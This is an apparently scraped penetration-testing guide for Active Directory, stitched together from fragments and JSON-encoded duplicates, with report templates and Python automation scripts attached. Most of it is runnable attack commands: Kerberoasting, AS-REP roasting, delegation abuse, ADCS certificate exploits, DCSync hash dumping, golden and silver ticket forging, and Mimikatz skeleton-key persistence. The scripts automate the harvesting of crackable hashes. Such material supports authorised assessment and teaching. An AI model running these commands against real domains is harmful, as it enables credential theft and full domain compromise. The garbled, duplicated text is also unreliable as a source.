Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

$' \\\n -computer-pass 'EvilPass123' -dc-ip 10.0.0.5\npython3 rbcd.py -delegate-to 'TARGET$' -delegate-from 'EVIL$'
\\\n -dc-ip 10.0.0.5 'corp.local/testuser:Password123'\nimpacket-getST 'corp.local/EVIL$:EvilPass123' -spn 'CIFS/target.corp.local' \\\n -impersonate administrator -dc-ip 10.0.0.5\n```\n\n## Phase 3 — ADCS (Active Directory Certificate Services) Attacks\n\n```bash\n# Enumerate ADCS with Certipy\ncertipy find -u '[email protected]' -p 'Password123' -dc-ip 10.0.0.5 \\\n -vulnerable -stdout\n\n# ESC1 — Vulnerable certificate template (enrollee can specify SAN)\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template VulnerableWebServer -upn [email protected]\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.0.0.5\n\n# ESC4 — Template ACL misconfiguration\n# Modify template to enable ESC1 conditions, then exploit as above\n\n# ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template User -upn [email protected]\n\n# ESC8 — NTLM relay to HTTP enrollment endpoint\ncertipy relay -target 'http://ca.corp.local/certsrv/certfnsh.asp' \\\n -template DomainController\n```\n\n## Phase 4 — Domain Privilege Escalation\n\n### DCSync Attack\n\n```bash\n# DCSync — extract all domain hashes (requires replication rights)\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' -just-dc\n\n# DCSync specific user\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' \\\n -just-dc-user krbtgt\n\n# With Mimikatz (Windows)\nmimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt\n```\n\n### Golden Ticket\n\n```bash\n# Create Golden Ticket (requires krbtgt hash and domain SID)\nimpacket-ticketer -nthash \u003ckrbtgt_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec 'corp.local/[email protected]' -k -no-pass\n\n# With Mimikatz\nmimikatz# kerberos::golden /user:administrator /domain:corp.local \\\n /sid:S-1-5-21-... 
/krbtgt:\u003chash> /ptt\n```\n\n### Silver Ticket\n\n```bash\n# Create Silver Ticket for specific service\nimpacket-ticketer -nthash \u003cservice_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local -spn MSSQL/sqlserver.corp.local administrator\n\nexport KRB5CCNAME=administrator.ccache\nimpacket-mssqlclient 'corp.local/[email protected]' -k -no-pass\n```\n\n## Phase 5 — Persistence Demonstration\n\n```bash\n# Skeleton Key (inject into LSASS — authorized testing only)\nmimikatz# privilege::debug\nmimikatz# misc::skeleton\n# Now any user can authenticate with \"mimikatz\" as password\n\n# AdminSDHolder persistence\n# Add controlled user to AdminSDHolder ACL\n# SDProp process propagates ACL to all protected groups every 60 minutes\n\n# SID History injection\n# Inject Domain Admin SID into low-privilege user's SID history\n\n# Document all persistence mechanisms and clean up after testing\n```\n\n## Findings and Remediation\n\n| Finding | CVSS | Remediation |\n|---------|------|-------------|\n| Kerberoastable accounts with weak passwords | 7.5 | Use gMSA, enforce 25+ char passwords for service accounts |\n| Unconstrained delegation on servers | 8.1 | Remove unconstrained delegation, use constrained or RBCD |\n| Vulnerable ADCS templates (ESC1-ESC8) | 9.8 | Audit templates, remove dangerous permissions, require approval |\n| DCSync permissions on non-DA accounts | 9.8 | Audit replication rights, implement tiered admin model |\n| LLMNR/NBT-NS enabled | 8.1 | Disable via GPO |\n| No LAPS deployed | 7.2 | Deploy Windows LAPS for local admin management |\n| Weak domain password policy | 6.5 | Enforce 14+ chars, implement fine-grained password policies |\n\n## References\n\n- BloodHound: https://github.com/BloodHoundAD/BloodHound\n- Impacket: https://github.com/fortra/impacket\n- Certipy: https://github.com/ly4k/Certipy\n- HackTricks AD: https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html\n- SpecterOps AD Security: 
https://specterops.io/blog/\n- MITRE ATT&CK: https://attack.mitre.org/\n---","attachment_filenames":["assets/template.md","references/api-reference.md","references/standards.md","references/workflows.md","scripts/agent.py","scripts/process.py"],"attachments":[{"filename":"assets/template.md","content":"# Active Directory Penetration Test — Report Template\n\n## Document Control\n| Field | Value |\n|-------|-------|\n| Domain | [corp.local] |\n| Test Type | Active Directory Security Assessment |\n| Starting Access | Standard Domain User |\n| Period | [Start] — [End] |\n\n## Executive Summary\n[Summary of AD security posture, key attack paths discovered, and domain compromise status]\n\n## Attack Path Diagram\n```\ntestuser (Domain User)\n → Kerberoasting svc_sql (T1558.003)\n → Cracked password: \"SqlServer2024!\"\n → Local admin on SQL01 (T1078)\n → Mimikatz LSASS dump (T1003.001)\n → DA credentials: da_admin\n → DCSync all hashes (T1003.006)\n → FULL DOMAIN COMPROMISE\n```\n\n## Findings\n\n### Finding [N]: [Title]\n| Attribute | Detail |\n|-----------|--------|\n| Severity | [Critical/High/Medium/Low] |\n| MITRE ATT&CK | [Technique] |\n| Affected | [Accounts/Systems] |\n| Remediation | [Fix] |\n\n## Remediation Priority\n| # | Action | Timeline |\n|---|--------|----------|\n| 1 | Deploy gMSA for service accounts | 2 weeks |\n| 2 | Fix ADCS vulnerable templates | 1 week |\n| 3 | Implement tiered admin model | 30 days |\n| 4 | Enable LAPS | 30 days |\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1195,"content_sha256":"8b93883692ca2fa529d3ca3c6b175e36c324c984dc4471e91df38c6547ee15a0"},{"filename":"references/api-reference.md","content":"# Active Directory Penetration Test - API Reference\n\n## ldap3 Library\n\n### Connection\n```python\nfrom ldap3 import Server, Connection, ALL, SUBTREE\nserver = Server(\"ldaps://dc.example.com\", get_info=ALL, use_ssl=True)\nconn = Connection(server, user=\"DOMAIN\\\\user\", password=\"pass\", 
auto_bind=True)\n```\n\n### Key LDAP Queries\n\n| Purpose | Filter |\n|---------|--------|\n| All users | `(&(objectClass=user)(objectCategory=person))` |\n| Users with SPNs | `(&(objectClass=user)(servicePrincipalName=*))` |\n| AS-REP Roastable | `(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))` |\n| Domain admins | `(&(objectClass=group)(cn=Domain Admins))` |\n| Password policy | `(objectClass=domain)` |\n\n### UserAccountControl Flags\n\n| Flag | Hex | Test |\n|------|-----|------|\n| ACCOUNTDISABLE | 0x0002 | Account disabled |\n| PASSWD_NOTREQD | 0x0020 | No password required |\n| DONT_EXPIRE_PASSWORD | 0x10000 | Password never expires |\n| DONT_REQ_PREAUTH | 0x400000 | No Kerberos pre-auth |\n\n## Impacket Tools\n\n### GetUserSPNs (Kerberoasting)\n```bash\npython3 -m impacket.examples.GetUserSPNs DOMAIN/user:pass -dc-ip 10.0.0.1 -request\n```\n\n### GetNPUsers (AS-REP Roasting)\n```bash\npython3 -m impacket.examples.GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip 10.0.0.1\n```\n\n### secretsdump (Credential Extraction)\n```bash\npython3 -m impacket.examples.secretsdump DOMAIN/admin:[email protected]\n```\n\n## Attack Techniques\n\n### Kerberoasting\n1. Enumerate users with SPNs via LDAP\n2. Request TGS tickets for those SPNs\n3. Extract ticket hashes\n4. Crack offline with hashcat (mode 13100)\n\n### AS-REP Roasting\n1. Find accounts with pre-auth disabled\n2. Request AS-REP without authentication\n3. Extract encrypted part of AS-REP\n4. 
Crack offline with hashcat (mode 18200)\n\n### Password Policy Weaknesses\n- Min length \u003c 12 characters\n- No account lockout threshold\n- No password history enforcement\n- Password never expires on service accounts\n\n## Output Schema\n\n```json\n{\n \"report\": \"ad_penetration_test\",\n \"domain_info\": {\"default_naming_context\": \"DC=example,DC=com\"},\n \"total_users\": 500,\n \"total_findings\": 12,\n \"severity_summary\": {\"critical\": 1, \"high\": 8, \"medium\": 3}\n}\n```\n\n## CLI Usage\n\n```bash\npython agent.py --server ldaps://dc.example.com --username \"DOMAIN\\\\user\" --password \"pass\" --output report.json\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":2314,"content_sha256":"6a7461913dd1dab7527085cf527f9d54ed1ece0094c88abd804e25396c9fbae8"},{"filename":"references/standards.md","content":"# Standards — Active Directory Penetration Testing\n\n## Key Frameworks\n- MITRE ATT&CK for Enterprise: https://attack.mitre.org/matrices/enterprise/\n- ANSSI AD Security Guide: https://www.cert.ssi.gouv.fr/uploads/guide-ad.html\n- Microsoft Tiered Administration Model: https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model\n\n## MITRE ATT&CK Techniques for AD Testing\n\n| Technique | ID | Description |\n|-----------|----|-------------|\n| Kerberoasting | T1558.003 | Steal Kerberos TGS tickets for offline cracking |\n| AS-REP Roasting | T1558.004 | Target accounts without pre-auth |\n| DCSync | T1003.006 | Replicate domain credentials via DRSUAPI |\n| Golden Ticket | T1558.001 | Forge TGT using krbtgt hash |\n| Pass-the-Hash | T1550.002 | Authenticate using NTLM hash |\n| Unconstrained Delegation | T1558 | Abuse delegation to steal TGTs |\n| ADCS Abuse | T1649 | Exploit misconfigured certificate templates |\n\n## AD Security Benchmarks\n- CIS Microsoft Windows Server Benchmark\n- STIG (Security Technical Implementation Guide) for Windows\n- Microsoft Security 
Compliance Toolkit\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1125,"content_sha256":"524522d0429f13e2365f1c528a14abe420c632a3b2b040be2d3cd067af11666e"},{"filename":"references/workflows.md","content":"# Workflows — Active Directory Penetration Testing\n\n## AD Attack Flow\n\n```\nDomain User Credentials\n │\n ├── Enumeration\n │ ├── BloodHound (attack paths)\n │ ├── LDAP queries (users, groups, GPOs)\n │ └── Service account discovery (SPNs)\n │\n ├── Kerberos Attacks\n │ ├── Kerberoasting → Hash cracking\n │ ├── AS-REP Roasting → Hash cracking\n │ └── Delegation abuse (unconstrained/constrained/RBCD)\n │\n ├── ADCS Attacks\n │ ├── ESC1-ESC8 template exploitation\n │ └── Certificate-based auth to DA\n │\n ├── Credential Harvesting\n │ ├── LSASS dump (Mimikatz)\n │ ├── SAM/SYSTEM extraction\n │ └── DPAPI credential decryption\n │\n ├── Domain Escalation\n │ ├── DCSync (krbtgt + all hashes)\n │ ├── Golden Ticket\n │ └── AdminSDHolder persistence\n │\n └── Impact Demonstration\n ├── Full domain hash extraction\n ├── Access to sensitive resources\n └── Cross-forest trust abuse\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1169,"content_sha256":"d0673170c78afcb6d6c1639581c2e393562061c69a23027b0253f1a5fc6dcb55"},{"filename":"scripts/agent.py","content":"#!/usr/bin/env python3\n\"\"\"Active Directory Penetration Test agent - automates AD enumeration using\nldap3 for LDAP queries, subprocess for impacket tools, and generates a\nstructured pentest findings report.\"\"\"\n\nimport argparse\nimport json\nimport subprocess\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\ntry:\n from ldap3 import Server, Connection, ALL, SUBTREE\nexcept ImportError:\n print(\"Install ldap3: pip install ldap3\", file=sys.stderr)\n sys.exit(1)\n\n\ndef connect_ldap(server_url: str, username: str, password: str, use_ssl: bool = True) -> Connection:\n \"\"\"Establish authenticated LDAP connection.\"\"\"\n 
srv = Server(server_url, get_info=ALL, use_ssl=use_ssl)\n conn = Connection(srv, user=username, password=password, auto_bind=True)\n return conn\n\n\ndef get_domain_info(conn: Connection) -> dict:\n \"\"\"Extract domain functional level and naming context.\"\"\"\n info = conn.server.info\n return {\n \"default_naming_context\": info.other.get(\"defaultNamingContext\", [\"\"])[0],\n \"forest_functionality\": info.other.get(\"forestFunctionality\", [\"\"])[0],\n \"domain_functionality\": info.other.get(\"domainFunctionality\", [\"\"])[0],\n }\n\n\ndef enumerate_users(conn: Connection, base_dn: str) -> list[dict]:\n \"\"\"Enumerate all domain users with security-relevant attributes.\"\"\"\n conn.search(base_dn, \"(&(objectClass=user)(objectCategory=person))\",\n search_scope=SUBTREE,\n attributes=[\"sAMAccountName\", \"userAccountControl\", \"adminCount\",\n \"pwdLastSet\", \"lastLogon\", \"servicePrincipalName\",\n \"memberOf\", \"description\"])\n users = []\n for entry in conn.entries:\n uac = int(str(entry.userAccountControl)) if hasattr(entry, \"userAccountControl\") else 0\n users.append({\n \"username\": str(entry.sAMAccountName),\n \"admin_count\": str(entry.adminCount) if hasattr(entry, \"adminCount\") else \"0\",\n \"password_not_required\": bool(uac & 0x0020),\n \"password_never_expires\": bool(uac & 0x10000),\n \"account_disabled\": bool(uac & 0x0002),\n \"kerberos_preauth_not_required\": bool(uac & 0x400000),\n \"has_spn\": bool(entry.servicePrincipalName),\n \"description\": str(entry.description) if hasattr(entry, \"description\") else \"\",\n })\n return users\n\n\ndef find_asrep_roastable(users: list[dict]) -> list[dict]:\n \"\"\"Identify accounts vulnerable to AS-REP Roasting.\"\"\"\n findings = []\n for user in users:\n if user[\"kerberos_preauth_not_required\"] and not user[\"account_disabled\"]:\n findings.append({\n \"type\": \"asrep_roastable\",\n \"severity\": \"high\",\n \"account\": user[\"username\"],\n \"detail\": \"Kerberos 
pre-authentication disabled - AS-REP Roasting possible\",\n })\n return findings\n\n\ndef find_kerberoastable(users: list[dict]) -> list[dict]:\n \"\"\"Identify accounts vulnerable to Kerberoasting.\"\"\"\n findings = []\n for user in users:\n if user[\"has_spn\"] and not user[\"account_disabled\"]:\n findings.append({\n \"type\": \"kerberoastable\",\n \"severity\": \"high\",\n \"account\": user[\"username\"],\n \"detail\": \"User account with SPN set - Kerberoasting possible\",\n })\n return findings\n\n\ndef check_password_policy(conn: Connection, base_dn: str) -> list[dict]:\n \"\"\"Audit domain password policy.\"\"\"\n conn.search(base_dn, \"(objectClass=domain)\", search_scope=SUBTREE,\n attributes=[\"minPwdLength\", \"lockoutThreshold\", \"pwdHistoryLength\",\n \"maxPwdAge\", \"minPwdAge\", \"lockoutDuration\"])\n findings = []\n if conn.entries:\n entry = conn.entries[0]\n min_len = int(str(entry.minPwdLength)) if hasattr(entry, \"minPwdLength\") else 0\n lockout = int(str(entry.lockoutThreshold)) if hasattr(entry, \"lockoutThreshold\") else 0\n if min_len \u003c 12:\n findings.append({\n \"type\": \"weak_password_policy\",\n \"severity\": \"high\",\n \"detail\": f\"Minimum password length is {min_len} (recommended: 12+)\",\n })\n if lockout == 0:\n findings.append({\n \"type\": \"no_account_lockout\",\n \"severity\": \"critical\",\n \"detail\": \"No account lockout policy - brute force attacks possible\",\n })\n return findings\n\n\ndef run_impacket_getspns(dc_ip: str, domain: str, username: str, password: str) -> dict:\n \"\"\"Run impacket GetUserSPNs for Kerberoasting.\"\"\"\n cmd = [\"python3\", \"-m\", \"impacket.examples.GetUserSPNs\",\n f\"{domain}/{username}:{password}\", \"-dc-ip\", dc_ip, \"-request\"]\n try:\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)\n return {\"success\": True, \"output\": result.stdout[:5000], \"errors\": result.stderr[:1000]}\n except (subprocess.TimeoutExpired, FileNotFoundError) as e:\n return 
{\"success\": False, \"error\": str(e)}\n\n\ndef generate_report(server_url: str, username: str, password: str,\n use_ssl: bool, dc_ip: str = None) -> dict:\n \"\"\"Run full AD pentest enumeration and build report.\"\"\"\n conn = connect_ldap(server_url, username, password, use_ssl)\n domain_info = get_domain_info(conn)\n base_dn = domain_info[\"default_naming_context\"]\n\n users = enumerate_users(conn, base_dn)\n findings = []\n findings.extend(find_asrep_roastable(users))\n findings.extend(find_kerberoastable(users))\n findings.extend(check_password_policy(conn, base_dn))\n\n conn.unbind()\n\n from collections import Counter\n severity_counts = Counter(f[\"severity\"] for f in findings)\n return {\n \"report\": \"ad_penetration_test\",\n \"generated_at\": datetime.utcnow().isoformat() + \"Z\",\n \"domain_info\": domain_info,\n \"total_users\": len(users),\n \"total_findings\": len(findings),\n \"severity_summary\": dict(severity_counts),\n \"findings\": findings,\n }\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"AD Penetration Test Agent\")\n parser.add_argument(\"--server\", required=True, help=\"LDAP server URL (ldaps://dc.example.com)\")\n parser.add_argument(\"--username\", required=True, help=\"Domain username (DOMAIN\\\\\\\\user)\")\n parser.add_argument(\"--password\", required=True, help=\"Password\")\n parser.add_argument(\"--no-ssl\", action=\"store_true\", help=\"Disable SSL\")\n parser.add_argument(\"--dc-ip\", help=\"DC IP for impacket tools\")\n parser.add_argument(\"--output\", help=\"Output JSON file path\")\n args = parser.parse_args()\n\n report = generate_report(args.server, args.username, args.password,\n not args.no_ssl, args.dc_ip)\n output = json.dumps(report, indent=2)\n if args.output:\n Path(args.output).write_text(output, encoding=\"utf-8\")\n print(f\"Report written to {args.output}\")\n else:\n print(output)\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; 
charset=utf-8","language":"python","size":7053,"content_sha256":"4700864467979a016686de234dd11fc993c39055f29abff7477bafd38063eb82"},{"filename":"scripts/process.py","content":"#!/usr/bin/env python3\n\"\"\"\nActive Directory Penetration Test — Automation Process\n\nAutomates AD enumeration, Kerberos attack setup, and reporting.\nRequires: impacket, bloodhound-python, netexec, ldap3.\n\nUsage:\n python process.py --domain corp.local --dc-ip 10.0.0.5 -u testuser -p Password123 --output ./results\n\"\"\"\n\nimport subprocess\nimport json\nimport os\nimport argparse\nimport datetime\nfrom pathlib import Path\n\n\ndef run_command(cmd: list[str], timeout: int = 300) -> tuple[str, str, int]:\n try:\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)\n return result.stdout, result.stderr, result.returncode\n except subprocess.TimeoutExpired:\n return \"\", f\"Timed out after {timeout}s\", -1\n except FileNotFoundError:\n return \"\", f\"Not found: {cmd[0]}\", -1\n\n\ndef enumerate_domain_users(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> list[str]:\n \"\"\"Enumerate domain users via netexec over SMB (parses DOMAIN\\\\user tokens).\"\"\"\n print(\"[*] Enumerating domain users...\")\n stdout, stderr, rc = run_command(\n [\"netexec\", \"smb\", dc_ip, \"-u\", user, \"-p\", password, \"-d\", domain, \"--users\"]\n )\n users_file = output_dir / \"domain_users.txt\"\n users = []\n for line in stdout.splitlines():\n # Only keep output lines that carry a DOMAIN\\\\user token for this domain\n if \"\\\\\" in line and domain.split(\".\")[0].upper() in line.upper():\n parts = line.strip().split()\n for part in parts:\n if \"\\\\\" in part:\n username = part.split(\"\\\\\")[-1]\n users.append(username)\n with open(users_file, \"w\") as f:\n f.write(\"\\n\".join(users))\n print(f\"[+] Found {len(users)} domain users\")\n return users\n\n\ndef get_spn_users(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> str:\n \"\"\"Find Kerberoastable accounts.\"\"\"\n print(\"[*] Finding Kerberoastable service accounts...\")\n 
output_file = output_dir / \"kerberoast_hashes.txt\"\n stdout, stderr, rc = run_command(\n [\"impacket-GetUserSPNs\", f\"{domain}/{user}:{password}\",\n \"-dc-ip\", dc_ip, \"-outputfile\", str(output_file), \"-request\"]\n )\n if rc == 0:\n print(f\"[+] Kerberoast hashes saved to {output_file}\")\n else:\n print(f\"[-] Kerberoasting: {stderr[:200]}\")\n return str(output_file)\n\n\ndef get_asrep_users(domain: str, dc_ip: str, users_file: str,\n output_dir: Path) -> str:\n \"\"\"Find AS-REP Roastable accounts.\"\"\"\n print(\"[*] Finding AS-REP Roastable accounts...\")\n output_file = output_dir / \"asrep_hashes.txt\"\n stdout, stderr, rc = run_command(\n [\"impacket-GetNPUsers\", f\"{domain}/\", \"-usersfile\", users_file,\n \"-dc-ip\", dc_ip, \"-outputfile\", str(output_file), \"-format\", \"hashcat\"]\n )\n if rc == 0:\n print(f\"[+] AS-REP hashes saved to {output_file}\")\n return str(output_file)\n\n\ndef collect_bloodhound(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> None:\n \"\"\"Run BloodHound data collection.\"\"\"\n print(\"[*] Collecting BloodHound data...\")\n stdout, stderr, rc = run_command(\n [\"bloodhound-python\", \"-u\", user, \"-p\", password,\n \"-d\", domain, \"-ns\", dc_ip, \"-c\", \"all\", \"--zip\"],\n timeout=600\n )\n if rc == 0:\n print(\"[+] BloodHound data collected\")\n else:\n print(f\"[-] BloodHound: {stderr[:200]}\")\n\n\ndef check_adcs(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> str:\n \"\"\"Check for ADCS vulnerabilities.\"\"\"\n print(\"[*] Checking ADCS for vulnerable templates...\")\n output_file = output_dir / \"adcs_findings.txt\"\n stdout, stderr, rc = run_command(\n [\"certipy\", \"find\", \"-u\", f\"{user}@{domain}\", \"-p\", password,\n \"-dc-ip\", dc_ip, \"-vulnerable\", \"-stdout\"]\n )\n with open(output_file, \"w\") as f:\n f.write(stdout)\n if \"ESC\" in stdout:\n print(\"[+] Vulnerable ADCS templates found!\")\n else:\n print(\"[*] No vulnerable ADCS 
templates detected\")\n return str(output_file)\n\n\ndef generate_report(domain: str, output_dir: Path) -> str:\n \"\"\"Generate AD pentest report.\"\"\"\n print(\"[*] Generating report...\")\n report_file = output_dir / \"ad_pentest_report.md\"\n timestamp = datetime.datetime.now(datetime.timezone.utc).strftime(\"%Y-%m-%d %H:%M UTC\")\n\n kerberoast_count = 0\n kf = output_dir / \"kerberoast_hashes.txt\"\n if kf.exists():\n with open(kf) as f:\n kerberoast_count = sum(1 for line in f if line.strip() and line.startswith(\"$krb5tgs$\"))\n\n asrep_count = 0\n af = output_dir / \"asrep_hashes.txt\"\n if af.exists():\n with open(af) as f:\n asrep_count = sum(1 for line in f if line.strip() and line.startswith(\"$krb5asrep$\"))\n\n with open(report_file, \"w\") as f:\n f.write(f\"# Active Directory Penetration Test Report\\n\\n\")\n f.write(f\"**Domain:** {domain}\\n\")\n f.write(f\"**Generated:** {timestamp}\\n\\n---\\n\\n\")\n f.write(\"## Kerberos Attack Results\\n\\n\")\n f.write(f\"- Kerberoastable accounts: **{kerberoast_count}**\\n\")\n f.write(f\"- AS-REP Roastable accounts: **{asrep_count}**\\n\\n\")\n f.write(\"## Recommendations\\n\\n\")\n f.write(\"1. Convert service accounts to Group Managed Service Accounts (gMSA)\\n\")\n f.write(\"2. Enforce 25+ character passwords for remaining SPNs\\n\")\n f.write(\"3. Enable Kerberos pre-authentication for all accounts\\n\")\n f.write(\"4. Audit and remediate ADCS template vulnerabilities\\n\")\n f.write(\"5. Implement tiered administration model\\n\")\n f.write(\"6. 
Deploy monitoring for DCSync and Golden Ticket attacks\\n\")\n\n print(f\"[+] Report: {report_file}\")\n return str(report_file)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"AD Pentest Automation\")\n parser.add_argument(\"--domain\", required=True)\n parser.add_argument(\"--dc-ip\", required=True)\n parser.add_argument(\"-u\", \"--username\", required=True)\n parser.add_argument(\"-p\", \"--password\", required=True)\n parser.add_argument(\"--output\", default=\"./results\")\n args = parser.parse_args()\n\n output_dir = Path(args.output)\n output_dir.mkdir(parents=True, exist_ok=True)\n\n print(\"=\" * 60)\n print(f\" AD Penetration Test — {args.domain}\")\n print(\"=\" * 60)\n\n users = enumerate_domain_users(args.domain, args.dc_ip, args.username, args.password, output_dir)\n users_file = str(output_dir / \"domain_users.txt\")\n\n get_spn_users(args.domain, args.dc_ip, args.username, args.password, output_dir)\n get_asrep_users(args.domain, args.dc_ip, users_file, output_dir)\n collect_bloodhound(args.domain, args.dc_ip, args.username, args.password, output_dir)\n check_adcs(args.domain, args.dc_ip, args.username, args.password, output_dir)\n generate_report(args.domain, output_dir)\n\n print(\"\\n[+] AD pentest automation complete\")\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":6938,"content_sha256":"8a29b6c102e08f7d94aa52e16340ec541edc2f99d795933b460e31a08f70dec0"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Performing Active Directory Penetration Test","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. 
The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"When to Use","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When conducting security assessments that involve performing active directory penetration test","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When following incident response procedures for related security events","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When performing scheduled security testing or auditing activities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When validating security controls through hands-on testing","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Standard domain user credentials (minimum starting point)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network access to domain controllers (LDAP/389, Kerberos/88, SMB/445, DNS/53)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Tools: BloodHound, Impacket, Certipy, Rubeus, NetExec, Mimikatz","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Kali Linux or Windows attack machine with domain access","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 1 — AD Enumeration","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Domain Information 
Gathering","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Basic domain enumeration\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local --groups\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local --users\n\n# LDAP enumeration — domain controllers\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"OU=Domain Controllers,DC=corp,DC=local\" \"(objectClass=computer)\" dNSHostName\n\n# Enumerate trust relationships\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --trusts\n\n# Enumerate domain password policy\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --pass-pol\n\n# Enumerate Group Policy Objects\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --gpp-passwords\n\n# Find computers with unconstrained delegation\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"DC=corp,DC=local\" \"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))\" \\\n dNSHostName\n\n# Find users with constrained delegation\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"DC=corp,DC=local\" \"(&(objectCategory=user)(msds-allowedtodelegateto=*))\" \\\n sAMAccountName msds-allowedtodelegateto\n\n# Enumerate LAPS\nnetexec ldap 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local -M laps","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"BloodHound Attack Path Analysis","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Collect all BloodHound data\nbloodhound-python -u 'testuser' -p 'Password123' -d corp.local \\\n -ns 10.0.0.5 -c all --zip\n\n# Alternative: SharpHound from Windows\n.\\SharpHound.exe -c All --zipfilename bloodhound_data.zip\n\n# Start BloodHound\nsudo neo4j start\nbloodhound --no-sandbox\n\n# Key Cypher queries in BloodHound:\n# - Shortest path to Domain Admin\n# - Find 
Kerberoastable users\n# - Find AS-REP Roastable users\n# - Find users with DCSync rights\n# - Find shortest path from owned principals\n# - Find computers where Domain Users are local admin","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Service Account Discovery","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find service accounts with SPNs (Kerberoastable)\nimpacket-GetUserSPNs 'corp.local/testuser:Password123' -dc-ip 10.0.0.5\n\n# Find accounts without Kerberos pre-authentication\nimpacket-GetNPUsers 'corp.local/' -usersfile domain_users.txt \\\n -dc-ip 10.0.0.5 -format hashcat\n\n# Find managed service accounts\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"DC=corp,DC=local\" \"(objectClass=msDS-GroupManagedServiceAccount)\" \\\n sAMAccountName msDS-GroupMSAMembership","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 2 — Kerberos Attacks","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Kerberoasting","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Extract TGS tickets for service accounts\nimpacket-GetUserSPNs 'corp.local/testuser:Password123' -dc-ip 10.0.0.5 \\\n -outputfile kerberoast.txt -request\n\n# Crack with Hashcat (mode 13100 for Kerberos 5 TGS-REP etype 23)\nhashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt \\\n -r /usr/share/hashcat/rules/best64.rule --force\n\n# Targeted Kerberoasting with Rubeus (Windows)\n.\\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_tgs.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"AS-REP 